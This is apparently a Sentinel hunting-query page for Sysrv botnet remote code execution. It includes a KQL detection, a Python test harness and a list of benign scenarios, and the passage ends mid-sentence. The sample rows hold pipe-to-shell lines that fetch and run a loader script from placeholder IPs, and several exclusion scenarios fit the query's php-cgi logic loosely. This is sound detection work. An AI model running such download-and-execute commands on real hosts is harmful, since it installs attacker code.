Adversaries may exploit known vulnerabilities on Linux servers to execute remote code and deploy mining malware as part of a botnet. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect and mitigate Sysrv botnet activity before it leads to resource exhaustion and cryptocurrency mining operations.
KQL Query

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has "php-cgi.exe"
| where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')
```
```yaml
id: ec7ec6bb-c15a-4d2b-9682-a92bf5a22c8e
name: rce-on-vulnerable-server
description: |
  This query was originally published in the threat analytics report, Sysrv botnet evolution.
  Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
  The following query finds instances of remote code execution on a vulnerable Linux server.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where InitiatingProcessCommandLine has "php-cgi.exe"
  | where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled |
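To make the query's matching behaviour concrete before tuning it, here is an added Python example (not from the threat analytics report and not Microsoft's code) that replays the two `where` clauses over a handful of constructed DeviceProcessEvents rows. KQL `has` and `has_all` are case-insensitive, term-based matches rather than raw substring searches; the `has_term` helper below approximates that with word-boundary regexes instead of Kusto's term index, so treat it as an approximation for offline testing, not a reimplementation of the engine. All device names, IPs and command lines are constructed sample data.

```python
"""Added example: replay the Sysrv hunting query over constructed DeviceProcessEvents rows.

Not Microsoft's code. `has_term` approximates KQL `has` (case-insensitive, term-bounded);
`matches_hunt` applies the two `where` clauses of the query on this page.
"""
import re

# The three indicators the query requires via has_all(); all must be present.
INDICATORS = ("curl -fsSL", "/ldr.sh", "wget -q -O")


def has_term(text: str, term: str) -> bool:
    """Approximate KQL `has`: case-insensitive, and the term must not be glued
    to a neighbouring word character (so "php-cgi.exec" does not match
    "php-cgi.exe"). Terms starting or ending with punctuation, such as
    "/ldr.sh", get no boundary on that side, mirroring how Kusto tokenises."""
    pattern = re.escape(term)
    if re.match(r"\w", term):
        pattern = r"(?<!\w)" + pattern
    if re.search(r"\w$", term):
        pattern = pattern + r"(?!\w)"
    return re.search(pattern, text, re.IGNORECASE) is not None


def matches_hunt(event: dict) -> bool:
    """Clause 1: the initiating (parent) process command line has "php-cgi.exe".
    Clause 2: the child command line has all three indicators (has_all)."""
    if not has_term(event.get("InitiatingProcessCommandLine", ""), "php-cgi.exe"):
        return False
    child = event.get("ProcessCommandLine", "")
    return all(has_term(child, indicator) for indicator in INDICATORS)


def hunt(events: list[dict]) -> list[str]:
    """Return the DeviceName of every row the query would surface."""
    return [e["DeviceName"] for e in events if matches_hunt(e)]


# Constructed sample rows (hypothetical hosts and RFC 5737 documentation IPs).
SAMPLE_EVENTS = [
    {   # true positive: php-cgi parent, all three indicators in the child
        "DeviceName": "web-01",
        "InitiatingProcessCommandLine": "/usr/bin/php-cgi.exe -d allow_url_include=1",
        "ProcessCommandLine": 'sh -c "curl -fsSL http://203.0.113.10/ldr.sh | sh; '
                              'wget -q -O - http://203.0.113.10/ldr.sh | sh"',
    },
    {   # near miss: wget stage absent, so has_all() fails
        "DeviceName": "web-02",
        "InitiatingProcessCommandLine": "php-cgi.exe",
        "ProcessCommandLine": "sh -c 'curl -fsSL http://203.0.113.10/ldr.sh | sh'",
    },
    {   # near miss: indicators present but parent is not php-cgi
        "DeviceName": "build-03",
        "InitiatingProcessCommandLine": "/bin/bash",
        "ProcessCommandLine": "curl -fsSL https://example.test/ldr.sh && "
                              "wget -q -O out.sh https://example.test/ldr.sh",
    },
    {   # true positive despite case changes: KQL has/has_all are case-insensitive
        "DeviceName": "web-04",
        "InitiatingProcessCommandLine": "PHP-CGI.EXE -q",
        "ProcessCommandLine": "CURL -FSSL http://203.0.113.10/LDR.SH; WGET -Q -O - http://203.0.113.10/LDR.SH",
    },
]

if __name__ == "__main__":
    for name in hunt(SAMPLE_EVENTS):
        print("hit:", name)   # web-01 and web-04
```

The near-miss rows are the useful part: they show that a single indicator (or a parent other than php-cgi) is not enough to fire, which is also where any exclusions for the benign scenarios listed on this page should be tested before they are added to the production query.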
Scenario: Scheduled System Maintenance Task
Description: A legitimate system maintenance task, such as a nightly disk cleanup or log rotation, is executed on a Linux server using cron. This task may involve executing scripts or binaries that resemble malicious behavior.
Filter/Exclusion: Exclude processes initiated by cron or tasks with known maintenance scripts (e.g., /usr/sbin/logrotate, /etc/cron.daily/).
Scenario: Admin Performing Remote Code Execution for Patching
Description: An administrator uses a legitimate remote management tool like Ansible or SaltStack to execute a patching script on a vulnerable server. The script may involve executing commands that match the detection logic.
Filter/Exclusion: Exclude processes initiated by ansible-playbook or salt-cmd with known patching playbooks.
Scenario: Automated Security Scan Using Nessus or OpenVAS
Description: A security scan tool like Nessus or OpenVAS is running a vulnerability assessment on a server, which may involve executing scripts or commands that trigger the rule.
Filter/Exclusion: Exclude processes with parent process names like nessusd, openvas, or nmap and filter by known scan scripts.
Scenario: Legitimate Remote Debugging Session
Description: A developer uses a remote debugging tool like gdb or strace to debug a service running on a server. The tool may execute commands that match the rule’s detection logic.
Filter/Exclusion: Exclude processes with parent process names like gdb, strace, or gdbserver and filter by known debugging scripts.
Scenario: Cron Job for System Monitoring with sar or iostat
Description: A cron job runs system monitoring tools like sar or